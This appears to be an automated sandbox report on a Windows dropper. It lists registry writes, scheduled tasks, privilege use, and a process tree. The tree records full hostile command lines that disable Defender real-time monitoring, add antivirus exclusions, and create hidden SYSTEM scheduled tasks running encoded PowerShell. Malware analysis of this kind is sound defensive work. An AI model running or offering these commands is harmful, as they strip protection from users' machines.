7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 IbhinZm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 IbhinZm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 IbhinZm.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2424 schtasks.exe 2200 schtasks.exe 2572 schtasks.exe 1988 schtasks.exe 1492 schtasks.exe 1932 schtasks.exe 1240 schtasks.exe 1960 schtasks.exe 2040 schtasks.exe 2780 schtasks.exe 2792 schtasks.exe 2436 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 30 IoCs
pid Process 2572 powershell.exe 2832 powershell.EXE 2832 powershell.EXE 2832 powershell.EXE 1376 powershell.EXE 1376 powershell.EXE 1376 powershell.EXE 1592 powershell.exe 1500 powershell.EXE 1500 powershell.EXE 1500 powershell.EXE 1220 IbhinZm.exe 1220 IbhinZm.exe 1220 IbhinZm.exe 1220 IbhinZm.exe 1220 IbhinZm.exe 1220 IbhinZm.exe 1220 IbhinZm.exe 1220 IbhinZm.exe 2624 powershell.exe 2308 powershell.exe 1220 IbhinZm.exe 1220 IbhinZm.exe 1220 IbhinZm.exe 1220 IbhinZm.exe 1220 IbhinZm.exe 1220 IbhinZm.exe 1220 IbhinZm.exe 1220 IbhinZm.exe 1220 IbhinZm.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeDebugPrivilege 2572 powershell.exe Token: SeIncreaseQuotaPrivilege 2736 WMIC.exe Token: SeSecurityPrivilege 2736 WMIC.exe Token: SeTakeOwnershipPrivilege 2736 WMIC.exe Token: SeLoadDriverPrivilege 2736 WMIC.exe Token: SeSystemProfilePrivilege 2736 WMIC.exe Token: SeSystemtimePrivilege 2736 WMIC.exe Token: SeProfSingleProcessPrivilege 2736 WMIC.exe Token: SeIncBasePriorityPrivilege 2736 WMIC.exe Token: SeCreatePagefilePrivilege 2736 WMIC.exe Token: SeBackupPrivilege 2736 WMIC.exe Token: SeRestorePrivilege 2736 WMIC.exe Token: SeShutdownPrivilege 2736 WMIC.exe Token: SeDebugPrivilege 2736 WMIC.exe Token: SeSystemEnvironmentPrivilege 2736 WMIC.exe Token: SeRemoteShutdownPrivilege 2736 WMIC.exe Token: SeUndockPrivilege 2736 WMIC.exe Token: SeManageVolumePrivilege 2736 WMIC.exe Token: 33 2736 WMIC.exe Token: 34 2736 WMIC.exe Token: 35 2736 WMIC.exe Token: SeDebugPrivilege 2832 powershell.EXE Token: SeDebugPrivilege 1376 powershell.EXE Token: SeDebugPrivilege 1592 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2204 WMIC.exe Token: SeIncreaseQuotaPrivilege 2204 WMIC.exe Token: SeSecurityPrivilege 2204 WMIC.exe Token: SeTakeOwnershipPrivilege 2204 WMIC.exe Token: SeLoadDriverPrivilege 2204 WMIC.exe Token: SeSystemtimePrivilege 2204 WMIC.exe Token: SeBackupPrivilege 2204 WMIC.exe Token: SeRestorePrivilege 2204 WMIC.exe Token: SeShutdownPrivilege 2204 WMIC.exe Token: SeSystemEnvironmentPrivilege 2204 WMIC.exe Token: SeUndockPrivilege 2204 WMIC.exe Token: SeManageVolumePrivilege 2204 WMIC.exe Token: SeDebugPrivilege 1500 powershell.EXE Token: SeDebugPrivilege 2624 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1916 WMIC.exe Token: SeIncreaseQuotaPrivilege 1916 WMIC.exe Token: SeSecurityPrivilege 1916 WMIC.exe Token: SeTakeOwnershipPrivilege 1916 WMIC.exe Token: SeLoadDriverPrivilege 1916 WMIC.exe Token: SeSystemtimePrivilege 1916 WMIC.exe Token: SeBackupPrivilege 1916 WMIC.exe Token: SeRestorePrivilege 1916 WMIC.exe Token: SeShutdownPrivilege 1916 WMIC.exe Token: SeSystemEnvironmentPrivilege 1916 WMIC.exe Token: SeUndockPrivilege 1916 WMIC.exe Token: SeManageVolumePrivilege 1916 WMIC.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeAssignPrimaryTokenPrivilege 3040 WMIC.exe Token: SeIncreaseQuotaPrivilege 3040 WMIC.exe Token: SeSecurityPrivilege 3040 WMIC.exe Token: SeTakeOwnershipPrivilege 3040 WMIC.exe Token: SeLoadDriverPrivilege 3040 WMIC.exe Token: SeSystemtimePrivilege 3040 WMIC.exe Token: SeBackupPrivilege 3040 WMIC.exe Token: SeRestorePrivilege 3040 WMIC.exe Token: SeShutdownPrivilege 3040 WMIC.exe Token: SeSystemEnvironmentPrivilege 3040 WMIC.exe Token: SeUndockPrivilege 3040 WMIC.exe Token: SeManageVolumePrivilege 3040 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1992 wrote to memory of 2236 1992 ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe 28 PID 1992 wrote to memory of 2236 1992 ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe 28 PID 1992 wrote to memory of 2236 1992 ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe 28 PID 1992 wrote to memory of 2236 1992 ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe 28 PID 1992 wrote to memory of 2236 1992 ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe 28 PID 1992 wrote to memory of 2236 1992 ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe 28 PID 1992 wrote to memory of 2236 1992 ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe 28 PID 2236 wrote to memory of 2744 2236 Install.exe 29 PID 2236 wrote to memory of 2744 2236 Install.exe 29 PID 2236 wrote to memory of 2744 2236 Install.exe 29 PID 2236 wrote to memory of 2744 2236 Install.exe 29 PID 2236 wrote to memory of 2744 2236 Install.exe 29 PID 2236 wrote to memory of 2744 2236 Install.exe 29 PID 2236 wrote to memory of 2744 2236 Install.exe 29 PID 2744 wrote to memory of 2712 2744 Install.exe 31 PID 2744 wrote to memory of 2712 2744 Install.exe 31 PID 2744 wrote to memory of 2712 2744 Install.exe 31 PID 2744 wrote to memory of 2712 2744 Install.exe 31 PID 2744 wrote to memory of 2712 2744 Install.exe 31 PID 2744 wrote to memory of 2712 2744 Install.exe 31 PID 2744 wrote to memory of 2712 2744 Install.exe 31 PID 2712 wrote to memory of 2864 2712 forfiles.exe 33 PID 2712 wrote to memory of 2864 2712 forfiles.exe 33 PID 2712 wrote to memory of 2864 2712 forfiles.exe 33 PID 2712 wrote to memory of 2864 2712 forfiles.exe 33 PID 2712 wrote to memory of 2864 2712 forfiles.exe 33 PID 2712 wrote to memory of 2864 2712 forfiles.exe 33 PID 2712 wrote to memory of 2864 2712 forfiles.exe 33 PID 2864 wrote to memory of 2572 2864 cmd.exe 34 PID 2864 wrote to memory of 2572 2864 cmd.exe 34 PID 2864 wrote to memory of 2572 2864 cmd.exe 34 PID 2864 wrote to memory of 2572 2864 cmd.exe 34 PID 2864 wrote to memory of 2572 2864 cmd.exe 34 PID 2864 wrote to memory of 2572 2864 cmd.exe 34 PID 2864 wrote to memory of 2572 2864 cmd.exe 34 PID 2572 wrote to memory of 2736 2572 powershell.exe 35 PID 2572 wrote to memory of 2736 2572 powershell.exe 35 PID 2572 wrote to memory of 2736 2572 powershell.exe 35 PID 2572 wrote to memory of 2736 2572 powershell.exe 35 PID 2572 wrote to memory of 2736 2572 powershell.exe 35 PID 2572 wrote to memory of 2736 2572 powershell.exe 35 PID 2572 wrote to memory of 2736 2572 powershell.exe 35 PID 2744 wrote to memory of 2436 2744 Install.exe 36 PID 2744 wrote to memory of 2436 2744 Install.exe 36 PID 2744 wrote to memory of 2436 2744 Install.exe 36 PID 2744 wrote to memory of 2436 2744 Install.exe 36 PID 2744 wrote to memory of 2436 2744 Install.exe 36 PID 2744 wrote to memory of 2436 2744 Install.exe 36 PID 2744 wrote to memory of 2436 2744 Install.exe 36 PID 2024 wrote to memory of 2032 2024 taskeng.exe 41 PID 2024 wrote to memory of 2032 2024 taskeng.exe 41 PID 2024 wrote to memory of 2032 2024 taskeng.exe 41 PID 2024 wrote to memory of 2032 2024 taskeng.exe 41 PID 2032 wrote to memory of 1932 2032 zxpwdlP.exe 42 PID 2032 wrote to memory of 1932 2032 zxpwdlP.exe 42 PID 2032 wrote to memory of 1932 2032 zxpwdlP.exe 42 PID 2032 wrote to memory of 1932 2032 zxpwdlP.exe 42 PID 2032 wrote to memory of 2792 2032 zxpwdlP.exe 44 PID 2032 wrote to memory of 2792 2032 zxpwdlP.exe 44 PID 2032 wrote to memory of 2792 2032 zxpwdlP.exe 44 PID 2032 wrote to memory of 2792 2032 zxpwdlP.exe 44 PID 1656 wrote to memory of 2832 1656 taskeng.exe 47 PID 1656 wrote to memory of 2832 1656 taskeng.exe 47 PID 1656 wrote to memory of 2832 1656 taskeng.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe"C:\Users\Admin\AppData\Local\Temp\ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Users\Admin\AppData\Local\Temp\7zS1A83.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Users\Admin\AppData\Local\Temp\7zS1EE6.tmp\Install.exe.\Install.exe /iLdidEHGZ "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "brlogsXZdQLKJRjYtj" /SC once /ST 05:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom\WAZLfnWFkOIyIxR\zxpwdlP.exe\" OF /KgdidrG 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2436
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 5044⤵
- Loads dropped DLL
- Program crash
PID:1720
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {9F66153D-A706-4186-9A8C-3E56C053AED2} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom\WAZLfnWFkOIyIxR\zxpwdlP.exeC:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom\WAZLfnWFkOIyIxR\zxpwdlP.exe OF /KgdidrG 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "giIFGvDdF" /SC once /ST 02:33:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:1932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "giIFGvDdF"3⤵PID:2792
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "giIFGvDdF"3⤵PID:1904
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1496
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:836
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:2880
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gZgEDmWMy" /SC once /ST 04:28:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2424
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gZgEDmWMy"3⤵PID:1064
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gZgEDmWMy"3⤵PID:2116
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:2400
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:2088
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1592 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:323⤵PID:3024
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:3048
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:643⤵PID:3028
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:3052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:323⤵PID:1324
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:324⤵PID:1988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:643⤵PID:1884
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:644⤵PID:1004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\PfAmACXkWBLbKqPZ\OQnQKElp\pniHQwrvPVzKEiGL.wsf"3⤵PID:2592
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\PfAmACXkWBLbKqPZ\OQnQKElp\pniHQwrvPVzKEiGL.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2812 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TuhNvssQnTUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TuhNvssQnTUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZDLVjxnHU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZDLVjxnHU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijGSqddcuZeU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijGSqddcuZeU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wWtwQxeSPhIsC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wWtwQxeSPhIsC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rPjTFWmQUriHtIVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rPjTFWmQUriHtIVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1204
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1640
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2260
-
-
